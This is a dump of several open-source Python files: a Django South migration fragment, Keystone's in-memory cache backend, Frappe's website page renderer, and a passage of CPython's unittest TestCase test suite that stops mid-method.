'search.bug': {
'bize_size_tag_name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'canonical_bug_link': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'concerns_just_documentation': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'date_reported': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.TextField', [], {}),
'good_for_newcomers': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'importance': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'last_polled': ('django.db.models.fields.DateTimeField', [], {}),
'last_touched': ('django.db.models.fields.DateTimeField', [], {}),
'looks_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'people_involved': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'submitter_realname': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'submitter_username': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'search.hitcountcache': {
'hashed_query': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}),
'hit_count': ('django.db.models.fields.IntegerField', [], {})
},
'search.project': {
'cached_contributor_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True'}),
'date_icon_was_fetched_from_ohloh': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'icon_for_profile': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_for_search_result': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_raw': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_smaller_for_badge': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'logo_contains_name': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'})
},
'search.projectinvolvementquestion': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}),
'text': ('django.db.models.fields.TextField', [], {})
}
}
complete_apps = ['search']
|
agpl-3.0
|
MaheshIBM/keystone
|
keystone/common/kvs/backends/inmemdb.py
|
26
|
1902
|
# Copyright 2013 Metacloud, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Keystone In-Memory Dogpile.cache backend implementation.
"""
import copy
from dogpile.cache import api
NO_VALUE = api.NO_VALUE
class MemoryBackend(api.CacheBackend):
"""A backend that uses a plain dictionary.
There is no size management, and values which are placed into the
dictionary will remain until explicitly removed. Note that Dogpile's
expiration of items is based on timestamps and does not remove them from
the cache.
E.g.::
from dogpile.cache import make_region
region = make_region().configure(
'keystone.common.kvs.Memory'
)
"""
def __init__(self, arguments):
self._db = {}
def _isolate_value(self, value):
if value is not NO_VALUE:
return copy.deepcopy(value)
return value
def get(self, key):
return self._isolate_value(self._db.get(key, NO_VALUE))
def get_multi(self, keys):
return [self.get(key) for key in keys]
def set(self, key, value):
self._db[key] = self._isolate_value(value)
def set_multi(self, mapping):
for key, value in mapping.items():
self.set(key, value)
def delete(self, key):
self._db.pop(key, None)
def delete_multi(self, keys):
for key in keys:
self.delete(key)
|
apache-2.0
|
sbkolate/sap_frappe_v6
|
frappe/website/render.py
|
6
|
6115
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
import frappe.sessions
from frappe.utils import cstr
import mimetypes, json
from werkzeug.wrappers import Response
from werkzeug.routing import Map, Rule, NotFound
from frappe.website.context import get_context
from frappe.website.utils import get_home_page, can_cache, delete_page_cache
from frappe.website.router import clear_sitemap
from frappe.translate import guess_language
class PageNotFoundError(Exception): pass
def render(path, http_status_code=None):
"""render html page"""
path = resolve_path(path.strip("/ "))
try:
data = render_page_by_language(path)
except frappe.DoesNotExistError, e:
doctype, name = get_doctype_from_path(path)
if doctype and name:
path = "print"
frappe.local.form_dict.doctype = doctype
frappe.local.form_dict.name = name
elif doctype:
path = "list"
frappe.local.form_dict.doctype = doctype
else:
path = "404"
http_status_code = e.http_status_code
try:
data = render_page(path)
except frappe.PermissionError, e:
data, http_status_code = render_403(e, path)
except frappe.PermissionError, e:
data, http_status_code = render_403(e, path)
except frappe.Redirect, e:
return build_response(path, "", 301, {
"Location": frappe.flags.redirect_location,
"Cache-Control": "no-store, no-cache, must-revalidate"
})
except Exception:
path = "error"
data = render_page(path)
http_status_code = 500
data = add_csrf_token(data)
return build_response(path, data, http_status_code or 200)
def build_response(path, data, http_status_code, headers=None):
# build response
response = Response()
response.data = set_content_type(response, data, path)
response.status_code = http_status_code
response.headers[b"X-Page-Name"] = path.encode("utf-8")
response.headers[b"X-From-Cache"] = frappe.local.response.from_cache or False
if headers:
for key, val in headers.iteritems():
response.headers[bytes(key)] = val.encode("utf-8")
return response
def render_page_by_language(path):
translated_languages = frappe.get_hooks("translated_languages_for_website")
user_lang = guess_language(translated_languages)
if translated_languages and user_lang in translated_languages:
try:
if path and path != "index":
lang_path = '{0}/{1}'.format(user_lang, path)
else:
lang_path = user_lang # index
return render_page(lang_path)
except frappe.DoesNotExistError:
return render_page(path)
else:
return render_page(path)
def render_page(path):
"""get page html"""
out = None
if can_cache():
# return rendered page
page_cache = frappe.cache().hget("website_page", path)
if page_cache and frappe.local.lang in page_cache:
out = page_cache[frappe.local.lang]
if out:
frappe.local.response.from_cache = True
return out
return build(path)
def build(path):
if not frappe.db:
frappe.connect()
try:
return build_page(path)
except frappe.DoesNotExistError:
hooks = frappe.get_hooks()
if hooks.website_catch_all:
path = hooks.website_catch_all[0]
return build_page(path)
else:
raise
def build_page(path):
if not getattr(frappe.local, "path", None):
frappe.local.path = path
context = get_context(path)
html = frappe.get_template(context.template).render(context)
# html = frappe.get_template(context.base_template_path).render(context)
if can_cache(context.no_cache):
page_cache = frappe.cache().hget("website_page", path) or {}
page_cache[frappe.local.lang] = html
frappe.cache().hset("website_page", path, page_cache)
return html
def resolve_path(path):
if not path:
path = "index"
if path.endswith('.html'):
path = path[:-5]
if path == "index":
path = get_home_page()
frappe.local.path = path
if path != "index":
path = resolve_from_map(path)
return path
def resolve_from_map(path):
m = Map([Rule(r["from_route"], endpoint=r["to_route"], defaults=r.get("defaults"))
for r in frappe.get_hooks("website_route_rules")])
urls = m.bind_to_environ(frappe.local.request.environ)
try:
endpoint, args = urls.match("/" + path)
path = endpoint
if args:
# don't cache when there's a query string!
frappe.local.no_cache = 1
frappe.local.form_dict.update(args)
except NotFound:
pass
return path
def set_content_type(response, data, path):
if isinstance(data, dict):
response.headers[b"Content-Type"] = b"application/json; charset: utf-8"
data = json.dumps(data)
return data
response.headers[b"Content-Type"] = b"text/html; charset: utf-8"
if "." in path:
content_type, encoding = mimetypes.guess_type(path)
if not content_type:
content_type = "text/html; charset: utf-8"
response.headers[b"Content-Type"] = content_type.encode("utf-8")
return data
def clear_cache(path=None):
frappe.cache().delete_value("website_generator_routes")
delete_page_cache(path)
if not path:
clear_sitemap()
frappe.clear_cache("Guest")
frappe.cache().delete_value("_website_pages")
frappe.cache().delete_value("home_page")
for method in frappe.get_hooks("website_clear_cache"):
frappe.get_attr(method)(path)
def render_403(e, pathname):
path = "message"
frappe.local.message = """<p><strong>{error}</strong></p>
<p>
<a href="/login?redirect-to=/{pathname}" class="btn btn-primary">{login}</a>
</p>""".format(error=cstr(e.message), login=_("Login"), pathname=frappe.local.path)
frappe.local.message_title = _("Not Permitted")
return render_page(path), e.http_status_code
def get_doctype_from_path(path):
doctypes = frappe.db.sql_list("select name from tabDocType")
parts = path.split("/")
doctype = parts[0]
name = parts[1] if len(parts) > 1 else None
if doctype in doctypes:
return doctype, name
# try scrubbed
doctype = doctype.replace("_", " ").title()
if doctype in doctypes:
return doctype, name
return None, None
def add_csrf_token(data):
return data.replace("<!-- csrf_token -->", '<script>frappe.csrf_token = "{0}";</script>'.format(
frappe.local.session.data.csrf_token))
|
mit
|
moto-timo/ironpython3
|
Src/StdLib/Lib/unittest/test/test_case.py
|
4
|
64196
|
import contextlib
import difflib
import pprint
import pickle
import re
import sys
import logging
import warnings
import weakref
import inspect
from copy import deepcopy
from test import support
import unittest
from unittest.test.support import (
TestEquality, TestHashing, LoggingResult, LegacyLoggingResult,
ResultWithNoStartTestRunStopTestRun
)
from test.support import captured_stderr
log_foo = logging.getLogger('foo')
log_foobar = logging.getLogger('foo.bar')
log_quux = logging.getLogger('quux')
class Test(object):
"Keep these TestCase classes out of the main namespace"
class Foo(unittest.TestCase):
def runTest(self): pass
def test1(self): pass
class Bar(Foo):
def test2(self): pass
class LoggingTestCase(unittest.TestCase):
"""A test case which logs its calls."""
def __init__(self, events):
super(Test.LoggingTestCase, self).__init__('test')
self.events = events
def setUp(self):
self.events.append('setUp')
def test(self):
self.events.append('test')
def tearDown(self):
self.events.append('tearDown')
class Test_TestCase(unittest.TestCase, TestEquality, TestHashing):
### Set up attributes used by inherited tests
################################################################
# Used by TestHashing.test_hash and TestEquality.test_eq
eq_pairs = [(Test.Foo('test1'), Test.Foo('test1'))]
# Used by TestEquality.test_ne
ne_pairs = [(Test.Foo('test1'), Test.Foo('runTest')),
(Test.Foo('test1'), Test.Bar('test1')),
(Test.Foo('test1'), Test.Bar('test2'))]
################################################################
### /Set up attributes used by inherited tests
# "class TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
# ...
# "methodName defaults to "runTest"."
#
# Make sure it really is optional, and that it defaults to the proper
# thing.
def test_init__no_test_name(self):
class Test(unittest.TestCase):
def runTest(self): raise MyException()
def test(self): pass
self.assertEqual(Test().id()[-13:], '.Test.runTest')
# test that TestCase can be instantiated with no args
# primarily for use at the interactive interpreter
test = unittest.TestCase()
test.assertEqual(3, 3)
with test.assertRaises(test.failureException):
test.assertEqual(3, 2)
with self.assertRaises(AttributeError):
test.run()
# "class TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
def test_init__test_name__valid(self):
class Test(unittest.TestCase):
def runTest(self): raise MyException()
def test(self): pass
self.assertEqual(Test('test').id()[-10:], '.Test.test')
# "class TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
def test_init__test_name__invalid(self):
class Test(unittest.TestCase):
def runTest(self): raise MyException()
def test(self): pass
try:
Test('testfoo')
except ValueError:
pass
else:
self.fail("Failed to raise ValueError")
# "Return the number of tests represented by the this test object. For
# TestCase instances, this will always be 1"
def test_countTestCases(self):
class Foo(unittest.TestCase):
def test(self): pass
self.assertEqual(Foo('test').countTestCases(), 1)
# "Return the default type of test result object to be used to run this
# test. For TestCase instances, this will always be
# unittest.TestResult; subclasses of TestCase should
# override this as necessary."
def test_defaultTestResult(self):
class Foo(unittest.TestCase):
def runTest(self):
pass
result = Foo().defaultTestResult()
self.assertEqual(type(result), unittest.TestResult)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if setUp() raises
# an exception.
def test_run_call_order__error_in_setUp(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def setUp(self):
super(Foo, self).setUp()
raise RuntimeError('raised by Foo.setUp')
Foo(events).run(result)
expected = ['startTest', 'setUp', 'addError', 'stopTest']
self.assertEqual(events, expected)
# "With a temporary result stopTestRun is called when setUp errors.
def test_run_call_order__error_in_setUp_default_result(self):
events = []
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def setUp(self):
super(Foo, self).setUp()
raise RuntimeError('raised by Foo.setUp')
Foo(events).run()
expected = ['startTestRun', 'startTest', 'setUp', 'addError',
'stopTest', 'stopTestRun']
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test raises
# an error (as opposed to a failure).
def test_run_call_order__error_in_test(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
raise RuntimeError('raised by Foo.test')
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addError', 'stopTest']
Foo(events).run(result)
self.assertEqual(events, expected)
# "With a default result, an error in the test still results in stopTestRun
# being called."
def test_run_call_order__error_in_test_default_result(self):
events = []
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def test(self):
super(Foo, self).test()
raise RuntimeError('raised by Foo.test')
expected = ['startTestRun', 'startTest', 'setUp', 'test',
'tearDown', 'addError', 'stopTest', 'stopTestRun']
Foo(events).run()
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test signals
# a failure (as opposed to an error).
def test_run_call_order__failure_in_test(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
self.fail('raised by Foo.test')
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addFailure', 'stopTest']
Foo(events).run(result)
self.assertEqual(events, expected)
# "When a test fails with a default result stopTestRun is still called."
def test_run_call_order__failure_in_test_default_result(self):
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def test(self):
super(Foo, self).test()
self.fail('raised by Foo.test')
expected = ['startTestRun', 'startTest', 'setUp', 'test',
'tearDown', 'addFailure', 'stopTest', 'stopTestRun']
events = []
Foo(events).run()
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if tearDown() raises
# an exception.
def test_run_call_order__error_in_tearDown(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def tearDown(self):
super(Foo, self).tearDown()
raise RuntimeError('raised by Foo.tearDown')
Foo(events).run(result)
expected = ['startTest', 'setUp', 'test', 'tearDown', 'addError',
'stopTest']
self.assertEqual(events, expected)
# "When tearDown errors with a default result stopTestRun is still called."
def test_run_call_order__error_in_tearDown_default_result(self):
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def tearDown(self):
super(Foo, self).tearDown()
raise RuntimeError('raised by Foo.tearDown')
events = []
Foo(events).run()
expected = ['startTestRun', 'startTest', 'setUp', 'test', 'tearDown',
'addError', 'stopTest', 'stopTestRun']
self.assertEqual(events, expected)
# "TestCase.run() still works when the defaultTestResult is a TestResult
# that does not support startTestRun and stopTestRun.
def test_run_call_order_default_result(self):
class Foo(unittest.TestCase):
def defaultTestResult(self):
return ResultWithNoStartTestRunStopTestRun()
def test(self):
pass
Foo('test').run()
def _check_call_order__subtests(self, result, events, expected_events):
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
for i in [1, 2, 3]:
with self.subTest(i=i):
if i == 1:
self.fail('failure')
for j in [2, 3]:
with self.subTest(j=j):
if i * j == 6:
raise RuntimeError('raised by Foo.test')
1 / 0
# Order is the following:
# i=1 => subtest failure
# i=2, j=2 => subtest success
# i=2, j=3 => subtest error
# i=3, j=2 => subtest error
# i=3, j=3 => subtest success
# toplevel => error
Foo(events).run(result)
self.assertEqual(events, expected_events)
def test_run_call_order__subtests(self):
events = []
result = LoggingResult(events)
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addSubTestFailure', 'addSubTestSuccess',
'addSubTestFailure', 'addSubTestFailure',
'addSubTestSuccess', 'addError', 'stopTest']
self._check_call_order__subtests(result, events, expected)
def test_run_call_order__subtests_legacy(self):
# With a legacy result object (without a addSubTest method),
# text execution stops after the first subtest failure.
events = []
result = LegacyLoggingResult(events)
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addFailure', 'stopTest']
self._check_call_order__subtests(result, events, expected)
def _check_call_order__subtests_success(self, result, events, expected_events):
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
for i in [1, 2]:
with self.subTest(i=i):
for j in [2, 3]:
with self.subTest(j=j):
pass
Foo(events).run(result)
self.assertEqual(events, expected_events)
def test_run_call_order__subtests_success(self):
events = []
result = LoggingResult(events)
# The 6 subtest successes are individually recorded, in addition
# to the whole test success.
expected = (['startTest', 'setUp', 'test', 'tearDown']
+ 6 * ['addSubTestSuccess']
+ ['addSuccess', 'stopTest'])
self._check_call_order__subtests_success(result, events, expected)
def test_run_call_order__subtests_success_legacy(self):
# With a legacy result, only the whole test success is recorded.
events = []
result = LegacyLoggingResult(events)
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addSuccess', 'stopTest']
self._check_call_order__subtests_success(result, events, expected)
def test_run_call_order__subtests_failfast(self):
events = []
result = LoggingResult(events)
result.failfast = True
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
with self.subTest(i=1):
self.fail('failure')
with self.subTest(i=2):
self.fail('failure')
self.fail('failure')
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addSubTestFailure', 'stopTest']
Foo(events).run(result)
self.assertEqual(events, expected)
def test_subtests_failfast(self):
# Ensure proper test flow with subtests and failfast (issue #22894)
events = []
class Foo(unittest.TestCase):
def test_a(self):
with self.subTest():
events.append('a1')
events.append('a2')
def test_b(self):
with self.subTest():
events.append('b1')
with self.subTest():
self.fail('failure')
events.append('b2')
def test_c(self):
events.append('c')
result = unittest.TestResult()
result.failfast = True
suite = unittest.makeSuite(Foo)
suite.run(result)
expected = ['a1', 'a2', 'b1']
self.assertEqual(events, expected)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework. The initial value of this
# attribute is AssertionError"
def test_failureException__default(self):
class Foo(unittest.TestCase):
def test(self):
pass
self.assertIs(Foo('test').failureException, AssertionError)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework."
#
# Make sure TestCase.run() respects the designated failureException
def test_failureException__subclassing__explicit_raise(self):
events = []
result = LoggingResult(events)
class Foo(unittest.TestCase):
def test(self):
raise RuntimeError()
failureException = RuntimeError
self.assertIs(Foo('test').failureException, RuntimeError)
Foo('test').run(result)
expected = ['startTest', 'addFailure', 'stopTest']
self.assertEqual(events, expected)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework."
#
# Make sure TestCase.run() respects the designated failureException
def test_failureException__subclassing__implicit_raise(self):
events = []
result = LoggingResult(events)
class Foo(unittest.TestCase):
def test(self):
self.fail("foo")
failureException = RuntimeError
self.assertIs(Foo('test').failureException, RuntimeError)
Foo('test').run(result)
expected = ['startTest', 'addFailure', 'stopTest']
self.assertEqual(events, expected)
# "The default implementation does nothing."
def test_setUp(self):
class Foo(unittest.TestCase):
def runTest(self):
pass
# ... and nothing should happen
Foo().setUp()
# "The default implementation does nothing."
def test_tearDown(self):
class Foo(unittest.TestCase):
def runTest(self):
pass
# ... and nothing should happen
Foo().tearDown()
# "Return a string identifying the specific test case."
#
# Because of the vague nature of the docs, I'm not going to lock this
# test down too much. Really all that can be asserted is that the id()
# will be a string (either 8-byte or unicode -- again, because the docs
# just say "string")
def test_id(self):
class Foo(unittest.TestCase):
def runTest(self):
pass
self.assertIsInstance(Foo().id(), str)
# "If result is omitted or None, a temporary result object is created,
# used, and is made available to the caller. As TestCase owns the
# temporary result startTestRun and stopTestRun are called.
def test_run__uses_defaultTestResult(self):
events = []
defaultResult = LoggingResult(events)
class Foo(unittest.TestCase):
def test(self):
events.append('test')
def defaultTestResult(self):
return defaultResult
# Make run() find a result object on its own
result = Foo('test').run()
self.assertIs(result, defaultResult)
expected = ['startTestRun', 'startTest', 'test', 'addSuccess',
'stopTest', 'stopTestRun']
self.assertEqual(events, expected)
# "The result object is returned to run's caller"
def test_run__returns_given_result(self):
class Foo(unittest.TestCase):
def test(self):
pass
result = unittest.TestResult()
retval = Foo('test').run(result)
self.assertIs(retval, result)
# "The same effect [as method run] may be had by simply calling the
# TestCase instance."
def test_call__invoking_an_instance_delegates_to_run(self):
resultIn = unittest.TestResult()
resultOut = unittest.TestResult()
class Foo(unittest.TestCase):
def test(self):
pass
def run(self, result):
self.assertIs(result, resultIn)
return resultOut
retval = Foo('test')(resultIn)
self.assertIs(retval, resultOut)
def testShortDescriptionWithoutDocstring(self):
self.assertIsNone(self.shortDescription())
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testShortDescriptionWithOneLineDocstring(self):
"""Tests shortDescription() for a method with a docstring."""
self.assertEqual(
self.shortDescription(),
'Tests shortDescription() for a method with a docstring.')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testShortDescriptionWithMultiLineDocstring(self):
"""Tests shortDescription() for a method with a longer docstring.
This method ensures that only the first line of a docstring is
returned used in the short description, no matter how long the
whole thing is.
"""
self.assertEqual(
self.shortDescription(),
'Tests shortDescription() for a method with a longer '
'docstring.')
def testAddTypeEqualityFunc(self):
class SadSnake(object):
"""Dummy class for test_addTypeEqualityFunc."""
s1, s2 = SadSnake(), SadSnake()
self.assertFalse(s1 == s2)
def AllSnakesCreatedEqual(a, b, msg=None):
return type(a) == type(b) == SadSnake
self.addTypeEqualityFunc(SadSnake, AllSnakesCreatedEqual)
self.assertEqual(s1, s2)
# No this doesn't clean up and remove the SadSnake equality func
# from this TestCase instance but since its a local nothing else
# will ever notice that.
def testAssertIs(self):
thing = object()
self.assertIs(thing, thing)
self.assertRaises(self.failureException, self.assertIs, thing, object())
def testAssertIsNot(self):
thing = object()
self.assertIsNot(thing, object())
self.assertRaises(self.failureException, self.assertIsNot, thing, thing)
def testAssertIsInstance(self):
thing = []
self.assertIsInstance(thing, list)
self.assertRaises(self.failureException, self.assertIsInstance,
thing, dict)
def testAssertNotIsInstance(self):
thing = []
self.assertNotIsInstance(thing, dict)
self.assertRaises(self.failureException, self.assertNotIsInstance,
thing, list)
def testAssertIn(self):
animals = {'monkey': 'banana', 'cow': 'grass', 'seal': 'fish'}
self.assertIn('a', 'abc')
self.assertIn(2, [1, 2, 3])
self.assertIn('monkey', animals)
self.assertNotIn('d', 'abc')
self.assertNotIn(0, [1, 2, 3])
self.assertNotIn('otter', animals)
self.assertRaises(self.failureException, self.assertIn, 'x', 'abc')
self.assertRaises(self.failureException, self.assertIn, 4, [1, 2, 3])
self.assertRaises(self.failureException, self.assertIn, 'elephant',
animals)
self.assertRaises(self.failureException, self.assertNotIn, 'c', 'abc')
self.assertRaises(self.failureException, self.assertNotIn, 1, [1, 2, 3])
self.assertRaises(self.failureException, self.assertNotIn, 'cow',
animals)
def testAssertDictContainsSubset(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertDictContainsSubset({}, {})
self.assertDictContainsSubset({}, {'a': 1})
self.assertDictContainsSubset({'a': 1}, {'a': 1})
self.assertDictContainsSubset({'a': 1}, {'a': 1, 'b': 2})
self.assertDictContainsSubset({'a': 1, 'b': 2}, {'a': 1, 'b': 2})
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({1: "one"}, {})
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({'a': 2}, {'a': 1})
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({'c': 1}, {'a': 1})
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({'a': 1, 'c': 1}, {'a': 1})
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({'a': 1, 'c': 1}, {'a': 1})
one = ''.join(chr(i) for i in range(255))
# this used to cause a UnicodeDecodeError constructing the failure msg
with self.assertRaises(self.failureException):
self.assertDictContainsSubset({'foo': one}, {'foo': '\uFFFD'})
def testAssertEqual(self):
equal_pairs = [
((), ()),
({}, {}),
([], []),
(set(), set()),
(frozenset(), frozenset())]
for a, b in equal_pairs:
# This mess of try excepts is to test the assertEqual behavior
# itself.
try:
self.assertEqual(a, b)
except self.failureException:
self.fail('assertEqual(%r, %r) failed' % (a, b))
try:
self.assertEqual(a, b, msg='foo')
except self.failureException:
self.fail('assertEqual(%r, %r) with msg= failed' % (a, b))
try:
self.assertEqual(a, b, 'foo')
except self.failureException:
self.fail('assertEqual(%r, %r) with third parameter failed' %
(a, b))
unequal_pairs = [
((), []),
({}, set()),
(set([4,1]), frozenset([4,2])),
(frozenset([4,5]), set([2,3])),
(set([3,4]), set([5,4]))]
for a, b in unequal_pairs:
self.assertRaises(self.failureException, self.assertEqual, a, b)
self.assertRaises(self.failureException, self.assertEqual, a, b,
'foo')
self.assertRaises(self.failureException, self.assertEqual, a, b,
msg='foo')
def testEquality(self):
self.assertListEqual([], [])
self.assertTupleEqual((), ())
self.assertSequenceEqual([], ())
a = [0, 'a', []]
b = []
self.assertRaises(unittest.TestCase.failureException,
self.assertListEqual, a, b)
self.assertRaises(unittest.TestCase.failureException,
self.assertListEqual, tuple(a), tuple(b))
self.assertRaises(unittest.TestCase.failureException,
self.assertSequenceEqual, a, tuple(b))
b.extend(a)
self.assertListEqual(a, b)
self.assertTupleEqual(tuple(a), tuple(b))
self.assertSequenceEqual(a, tuple(b))
self.assertSequenceEqual(tuple(a), b)
self.assertRaises(self.failureException, self.assertListEqual,
a, tuple(b))
self.assertRaises(self.failureException, self.assertTupleEqual,
tuple(a), b)
self.assertRaises(self.failureException, self.assertListEqual, None, b)
self.assertRaises(self.failureException, self.assertTupleEqual, None,
tuple(b))
self.assertRaises(self.failureException, self.assertSequenceEqual,
None, tuple(b))
self.assertRaises(self.failureException, self.assertListEqual, 1, 1)
self.assertRaises(self.failureException, self.assertTupleEqual, 1, 1)
self.assertRaises(self.failureException, self.assertSequenceEqual,
1, 1)
self.assertDictEqual({}, {})
c = { 'x': 1 }
d = {}
self.assertRaises(unittest.TestCase.failureException,
self.assertDictEqual, c, d)
d.update(c)
self.assertDictEqual(c, d)
d['x'] = 0
self.assertRaises(unittest.TestCase.failureException,
self.assertDictEqual, c, d, 'These are unequal')
self.assertRaises(self.failureException, self.assertDictEqual, None, d)
self.assertRaises(self.failureException, self.assertDictEqual, [], d)
self.assertRaises(self.failureException, self.assertDictEqual, 1, 1)
def testAssertSequenceEqualMaxDiff(self):
self.assertEqual(self.maxDiff, 80*8)
seq1 = 'a' + 'x' * 80**2
seq2 = 'b' + 'x' * 80**2
diff = '\n'.join(difflib.ndiff(pprint.pformat(seq1).splitlines(),
pprint.pformat(seq2).splitlines()))
# the +1 is the leading \n added by assertSequenceEqual
omitted = unittest.case.DIFF_OMITTED % (len(diff) + 1,)
self.maxDiff = len(diff)//2
try:
self.assertSequenceEqual(seq1, seq2)
except self.failureException as e:
msg = e.args[0]
else:
self.fail('assertSequenceEqual did not fail.')
self.assertLess(len(msg), len(diff))
self.assertIn(omitted, msg)
self.maxDiff = len(diff) * 2
try:
self.assertSequenceEqual(seq1, seq2)
except self.failureException as e:
msg = e.args[0]
else:
self.fail('assertSequenceEqual did not fail.')
self.assertGreater(len(msg), len(diff))
self.assertNotIn(omitted, msg)
self.maxDiff = None
try:
self.assertSequenceEqual(seq1, seq2)
except self.failureException as e:
msg = e.args[0]
else:
self.fail('assertSequenceEqual did not fail.')
self.assertGreater(len(msg), len(diff))
self.assertNotIn(omitted, msg)
def testTruncateMessage(self):
self.maxDiff = 1
message = self._truncateMessage('foo', 'bar')
omitted = unittest.case.DIFF_OMITTED % len('bar')
self.assertEqual(message, 'foo' + omitted)
self.maxDiff = None
message = self._truncateMessage('foo', 'bar')
self.assertEqual(message, 'foobar')
self.maxDiff = 4
message = self._truncateMessage('foo', 'bar')
self.assertEqual(message, 'foobar')
def testAssertDictEqualTruncates(self):
test = unittest.TestCase('assertEqual')
def truncate(msg, diff):
return 'foo'
test._truncateMessage = truncate
try:
test.assertDictEqual({}, {1: 0})
except self.failureException as e:
self.assertEqual(str(e), 'foo')
else:
self.fail('assertDictEqual did not fail')
def testAssertMultiLineEqualTruncates(self):
test = unittest.TestCase('assertEqual')
def truncate(msg, diff):
return 'foo'
test._truncateMessage = truncate
try:
test.assertMultiLineEqual('foo', 'bar')
except self.failureException as e:
self.assertEqual(str(e), 'foo')
else:
self.fail('assertMultiLineEqual did not fail')
def testAssertEqual_diffThreshold(self):
# check threshold value
self.assertEqual(self._diffThreshold, 2**16)
# disable madDiff to get diff markers
self.maxDiff = None
